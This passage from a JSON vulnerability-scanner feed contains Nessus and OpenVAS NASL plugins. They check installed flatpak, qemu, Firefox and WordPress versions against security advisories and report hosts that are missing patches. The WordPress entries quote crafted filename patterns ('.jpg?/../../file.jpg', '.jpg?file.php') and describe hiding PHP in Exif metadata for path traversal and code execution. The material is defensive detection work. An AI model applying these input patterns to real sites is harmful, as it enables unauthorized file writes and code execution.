or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"flatpak-1.0.2-4.vl7\",\n \"flatpak-builder-1.0.0-4.vl7\",\n \"flatpak-devel-1.0.2-4.vl7\",\n \"flatpak-libs-1.0.2-4.vl7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-7\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flatpak / flatpak-builder / flatpak-devel / etc\");\n}\n", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-23T01:52:09", "bulletinFamily": "scanner", "description": "This update for qemu fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2019-6778: Fixed a heap buffer overflow issue in the SLiRP networking 
implementation (bsc#1123156).\n\nCVE-2018-19489: Fixed a denial of service vulnerability in virtfs (bsc#1117275).\n\nCVE-2018-19364: Fixed a use-after-free if the virtfs interface resulting in a denial of service (bsc#1116717).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-02-22T00:00:00", "published": "2019-02-22T00:00:00", "id": "SUSE_SU-2019-0457-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122397", "title": "SUSE SLES12 Security Update : qemu (SUSE-SU-2019:0457-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:0457-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122397);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/22 10:34:40\");\n\n script_cve_id(\"CVE-2018-19364\", \"CVE-2018-19489\", \"CVE-2019-6778\");\n\n script_name(english:\"SUSE SLES12 Security Update : qemu (SUSE-SU-2019:0457-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for qemu fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2019-6778: Fixed a heap buffer overflow issue in the SLiRP\nnetworking implementation (bsc#1123156).\n\nCVE-2018-19489: Fixed a denial of service vulnerability in virtfs\n(bsc#1117275).\n\nCVE-2018-19364: Fixed a use-after-free if the virtfs interface\nresulting in a denial of service (bsc#1116717).\n\nNote that Tenable Network Security has extracted the 
preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1116717\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1117275\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1123156\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-19364/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-19489/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6778/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20190457-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2198160c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2019-457=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:qemu-block-rbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-rbd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-guest-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-guest-agent-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-s390\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-s390-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-x86\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-x86-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 
ereg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"qemu-block-rbd-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"qemu-block-rbd-debuginfo-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"qemu-x86-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"qemu-x86-debuginfo-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"s390x\", reference:\"qemu-s390-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"s390x\", reference:\"qemu-s390-debuginfo-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"qemu-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"qemu-block-curl-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"qemu-block-curl-debuginfo-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"qemu-debugsource-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"qemu-guest-agent-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"qemu-guest-agent-debuginfo-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"qemu-lang-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"qemu-tools-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"qemu-tools-debuginfo-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"qemu-kvm-2.0.2-48.49.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qemu\");\n}\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-23T01:52:09", "bulletinFamily": "scanner", "description": "Security Fix(es) :\n\nThis update upgrades Firefox to version 60.5.1 ESR.\n\nSecurity Fix(es) :\n\n - chromium-browser, mozilla: Use after free in Skia (CVE-2018-18356) * mozilla: Integer overflow in Skia (CVE-2019-5785)", "modified": "2019-02-22T00:00:00", "published": "2019-02-22T00:00:00", "id": "SL_20190221_FIREFOX_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122390", "title": "Scientific Linux Security Update : firefox on SL7.x x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122390);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/22 10:34:40\");\n\n script_cve_id(\"CVE-2018-18356\", \"CVE-2019-5785\");\n\n script_name(english:\"Scientific Linux Security Update : firefox on SL7.x x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\nThis update upgrades Firefox to version 60.5.1 ESR.\n\nSecurity Fix(es) :\n\n - chromium-browser, mozilla: Use after free in Skia\n (CVE-2018-18356) * mozilla: Integer overflow in Skia\n (CVE-2019-5785)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1902&L=SCIENTIFIC-LINUX-ERRATA&P=7521\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5b4b0ed4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox and / or 
firefox-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"firefox-60.5.1-1.el7_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"firefox-debuginfo-60.5.1-1.el7_6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) 
security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-23T01:52:08", "bulletinFamily": "scanner", "description": "An update for flatpak is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nFlatpak is a system for building, distributing, and running sandboxed desktop applications on Linux.\n\nSecurity Fix(es) :\n\n* flatpak: potential /proc based sandbox escape (CVE-2019-8308)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-02-22T00:00:00", "id": "CENTOS_RHSA-2019-0375.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122353", "published": "2019-02-21T00:00:00", "title": "CentOS 7 : flatpak (CESA-2019:0375)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:0375 and \n# CentOS Errata and Security Advisory 2019:0375 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122353);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/02/22 10:34:41\");\n\n script_cve_id(\"CVE-2019-8308\");\n script_xref(name:\"RHSA\", value:\"2019:0375\");\n\n script_name(english:\"CentOS 7 : flatpak (CESA-2019:0375)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The 
remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for flatpak is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nFlatpak is a system for building, distributing, and running sandboxed\ndesktop applications on Linux.\n\nSecurity Fix(es) :\n\n* flatpak: potential /proc based sandbox escape (CVE-2019-8308)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2019-February/023203.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a8b1c87d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flatpak packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:flatpak\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:flatpak-builder\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:flatpak-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:flatpak-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/20\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"flatpak-1.0.2-4.el7_6\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"flatpak-builder-1.0.0-4.el7_6\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"flatpak-devel-1.0.2-4.el7_6\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"flatpak-libs-1.0.2-4.el7_6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2019-02-22T13:13:36", "bulletinFamily": "scanner", "description": "WordPress allows Path Traversal in wp_crop_image(). 
An attacker (who has\nprivileges to crop an image) can write the output image to an arbitrary directory via a filename containing two\nimage extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring.", "modified": "2019-02-22T00:00:00", "published": "2019-02-22T00:00:00", "id": "OPENVAS:1361412562310142032", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142032", "title": "WordPress <= 5.0.3 Path Traversal Vulnerability (Linux)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142032\");\n script_version(\"$Revision: 13826 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-22 08:18:35 +0100 (Fri, 22 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-02-22 14:19:50 +0700 (Fri, 22 Feb 2019)\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:P/A:N\");\n\n script_cve_id(\"CVE-2019-8943\");\n script_bugtraq_id(107089);\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"NoneAvailable\");\n\n script_name(\"WordPress <= 5.0.3 Path Traversal Vulnerability (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"wordpress/installed\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"WordPress allows Path Traversal in wp_crop_image(). 
An attacker (who has\nprivileges to crop an image) can write the output image to an arbitrary directory via a filename containing two\nimage extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring.\");\n\n script_tag(name:\"affected\", value:\"WordPress version 5.0.3 and prior.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"No known solution is available as of 22nd February, 2019.\nInformation regarding this issue will be updated once solution details are available.\");\n\n script_xref(name:\"URL\", value:\"https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\ninfos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE);\nversion = infos['version'];\npath = infos['location'];\n\nif (version_is_less_equal(version: version, test_version: \"5.0.3\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"None\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-02-22T13:13:36", "bulletinFamily": "scanner", "description": "WordPress allows remote code execution because an _wp_attached_file Post Meta\nentry can be changed to an arbitrary string, such as one ending with a .jpg?file.php substring. An attacker with\nauthor privileges can execute arbitrary code by uploading a crafted image containing PHP code in the Exif\nmetadata. 
Exploitation can leverage CVE-2019-8943.", "modified": "2019-02-22T00:00:00", "published": "2019-02-22T00:00:00", "id": "OPENVAS:1361412562310142029", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142029", "title": "WordPress RCE Vulnerability CVE-2019-8942 (Linux)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142029\");\n script_version(\"$Revision: 13826 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-22 08:18:35 +0100 (Fri, 22 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-02-22 13:59:06 +0700 (Fri, 22 Feb 2019)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2019-8942\");\n script_bugtraq_id(107088);\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"WordPress RCE Vulnerability CVE-2019-8942 
(Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"wordpress/installed\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"WordPress allows remote code execution because an _wp_attached_file Post Meta\nentry can be changed to an arbitrary string, such as one ending with a .jpg?file.php substring. An attacker with\nauthor privileges can execute arbitrary code by uploading a crafted image containing PHP code in the Exif\nmetadata. Exploitation can leverage CVE-2019-8943.\");\n\n script_tag(name:\"affected\", value:\"WordPress prior version 4.9.9 and 5.0.1.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.9.9, 5.0.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\ninfos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE);\nversion = infos['version'];\npath = infos['location'];\n\nif (version_is_less(version: version, test_version: \"4.9.9\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.9.9\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version =~ \"^5\\.\") {\n if (version_is_less(version: version, test_version: \"5.0.1\")) {\n report = 